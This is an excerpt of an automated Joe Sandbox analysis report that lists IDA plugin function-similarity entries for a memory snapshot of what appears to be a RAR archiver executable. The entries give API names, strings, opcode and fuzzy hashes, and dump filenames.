                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                        • Instruction ID: 9835ce213e80b78b4bc7d298e885a08c2a3106f901096754cf3c72dcc3c1c8bc
                                                        • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                        • Instruction Fuzzy Hash: 3451BCBAB106518AEB44DFB4D8405AC77B0F708788B90403ADE2E57B88DF3CD546CB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                        • Instruction ID: 8db55ebacc04ad3cfce5f88795a8f9e7fe5f5cae8785454c8fa1dc3d91c30ae1
                                                        • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                        • Instruction Fuzzy Hash: 81314F66B14651C9FB00DFB4D8401BC7770FB08758B945026DE1E97AA8EF38D596C360
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: exe$rar$rebuilt.$sfx
                                                        • API String ID: 0-13699710
                                                        • Opcode ID: 6360e25de1dba6ae756d2c5481916c9a96ad9c3a96a58d2962cf1e33d7e7eddd
                                                        • Instruction ID: 883f28b8de7369cc755080301428c564241033c0ba0be72aa5f1052159dc35d1
                                                        • Opcode Fuzzy Hash: 6360e25de1dba6ae756d2c5481916c9a96ad9c3a96a58d2962cf1e33d7e7eddd
                                                        • Instruction Fuzzy Hash: 24819A29A0C6C245EB20FB68D4512F99792FB85384FC04137D96F476CADE6DD507C7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwindabort
                                                        • String ID: csm$f
                                                        • API String ID: 3913153233-629598281
                                                        • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                        • Instruction ID: 857df8ed28fb78b212493071ff6c534ec4bc931e45bc3bce2e3c5daf0279a413
                                                        • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                        • Instruction Fuzzy Hash: 2F61CA39B0554286EB14EB11E488A79B791FB44794F984536DEAB077C4EF3CE842C7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Security$File$DescriptorLength
                                                        • String ID: $ACL
                                                        • API String ID: 2361174398-1852320022
                                                        • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                        • Instruction ID: 15065335cf930748e218b4f6aad0efec11dc0a880c14e2d6051628738ca4955b
                                                        • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                        • Instruction Fuzzy Hash: 6F31886AB19A8191E720FB11E4507E9A3A5FB88784FC04132DA9E43BD5DF3CE607C790
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                        • String ID: CompareStringOrdinal$kernel32.dll
                                                        • API String ID: 2522007465-2120454788
                                                        • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                        • Instruction ID: a70f9ce732d0371e699715afc5f38b9880575ecbeda2b7004582256e9922c26e
                                                        • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                        • Instruction Fuzzy Hash: 5C217F69A4D68281E750BB91AD44178E3A0BF54B90FD44136EE7F43BE4EF2CE45783A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Time$File$swprintf$LocalSystem
                                                        • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                        • API String ID: 1364621626-1794493780
                                                        • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                        • Instruction ID: 1ec7a2aea86090f481ca4da22b000017cb39f9942146985df10136f32352bb16
                                                        • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                        • Instruction Fuzzy Hash: F521F97AA182418EE750DF64E440A9DB7F0F748798F944032EE5993B89DB3DD941CF50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                        • Instruction ID: ab385ccf57f34cab39d04a49ca5c12180055683675254416233a92e3f4bfdc1e
                                                        • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                        • Instruction Fuzzy Hash: 93F0A429A19A4281EF44AF10F4502B9A360AF88780FC41036E97F42BE4EE3CD44AC361
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                        • Instruction ID: 946ec16e43a124225eea4acba7fb4541387762ee14554fea300ce79f5ec615a5
                                                        • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                        • Instruction Fuzzy Hash: 48A11D66B4878245FB60AF648000379A791AF44BA4FC64A37D97F067E5EF3CD44683A2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                        • Instruction ID: 17db7144cf6b84ae079edf5005b4184799b494e744c9c580d063b94c20fd9a9d
                                                        • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                        • Instruction Fuzzy Hash: F081042AE1864285F710AB65D4806BCA7A5BB49B54FC24937DD2F037D1CF3CA4A7C362
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                        • String ID:
                                                        • API String ID: 3659116390-0
                                                        • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                        • Instruction ID: 7486b2219125fb1a673c06063ca725eb504758f6ecb4e758fb37371e8b5536e9
                                                        • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                        • Instruction Fuzzy Hash: 7A51E336A14A528AE710DB25D4403ACBBB0BB48798F858536CE2A47B98DF3CD156C761
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                        • String ID:
                                                        • API String ID: 643171463-0
                                                        • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                        • Instruction ID: 58cd4caddeba033a629b33dedc92fc530f42cbe3f2781244110a52d7eae9a799
                                                        • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                        • Instruction Fuzzy Hash: 8F41AA69E0964281EB10BB21A9102B9A3A1BF457B0F844336D97F177D5DE3C9457C7A0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                        • Instruction ID: 49d99b14135b91148155797f9edf1bf9b01b8922ce049bfd4eac86dcc7fac192
                                                        • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                        • Instruction Fuzzy Hash: 2441D969F0960191FB15AB1598005B5E7A2BF04BD0F9A8936DD7F4B7D4EE3CE40283A1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                        • Instruction ID: 02c139ee6408927b3dd1a3f8de287ca936064d2453fef542f7eb0cbbdc82f2ac
                                                        • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                        • Instruction Fuzzy Hash: 5E11B63EE1860205F7547124E486375A3416F457E0F864E36E57F076D6CEACA4C241E3
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
